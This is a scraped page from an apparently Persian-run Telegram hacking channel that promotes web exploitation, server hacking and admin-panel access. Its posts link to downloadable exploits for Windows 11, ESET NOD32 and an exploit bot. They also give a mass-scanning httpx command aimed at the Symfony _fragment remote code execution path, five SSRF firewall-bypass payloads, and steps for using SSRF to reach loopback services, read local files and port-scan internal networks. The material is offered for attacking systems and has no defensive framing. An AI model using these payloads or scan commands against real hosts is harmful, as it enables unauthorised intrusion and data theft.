0Day.Today | Learn Exploit | Zero World | Dark web |
20.6K subscribers
1.25K photos
133 videos
491 files
1.3K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Windows 11 24H2 NT Exploit

Github

#Windows #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥7
Exploits Symfony

httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"

Github

#Exploit #RCE
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3
Zero Exploiter 🔥 Bot Exploit 💎

Share and subscribe

Made with ❤️

#Priv8 #Exploit
——————‌
0Day.Today
@LearnExploit
@A3L3_KA4
🔥72👍1👏1
Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path

Exploit Author: Ex3ptionaL

Exploit Date: 2024-04-01

Vendor: https://www.eset.com

Version: 17.0.16.0

Tested on OS: Microsoft Windows 10 pro x64

🕷 Exploit-db

⬇️ Download

#Exploit #ESET #NOD32

📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4
Please open Telegram to view this post
VIEW IN TELEGRAM
63👍3🔥2❤‍🔥1
SSRF Payloads To Bypass Firewall

Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):

1) Bypass SSRF with CIDR:
http://127.127.127.127
http://127.0.0.0

2) Bypass using rare address:
http://127.1
http://0

3) Bypass using tricks combination:
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3

4) Bypass against a weak parser:
http://127.1.1.1:80\@127.2.2.2:80/

5) Bypass localhost with [:]:
http://[::1:80/
http://0000::1:80/

Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:

Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.

For example:
We discover that the following URL works:


https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000


We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network

#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍3💔3
Article introducing and exploiting 4 bugs
مقاله ی معرفی و اکسپلویت کردن 4 باگ :

1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization


#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO

♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
Article introducing and exploiting 4 bugs.pdf
376.6 KB
Article introducing and exploiting 4 bugs
مقاله ی معرفی و اکسپلویت کردن 4 باگ :

1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization


#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO

♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit